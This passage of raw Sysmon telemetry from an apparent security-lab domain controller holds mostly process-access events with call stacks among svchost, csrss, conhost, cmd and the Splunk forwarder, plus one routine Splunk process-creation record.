4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.783{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.767{59A5CD1D-8E57-6005-3800-00000000A301}35283548C:\Windows\system32\conhost.exe{59A5CD1D-8E57-6005-3700-00000000A301}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.752{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3528C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.752{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.752{59A5CD1D-8E56-6005-3000-00000000A301}25322572C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{00000000-0000-0000-0000-000000000000}3520C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+f2b15|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.753{59A5CD1D-8E57-6005-3700-00000000A301}3520C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.611{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.580{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 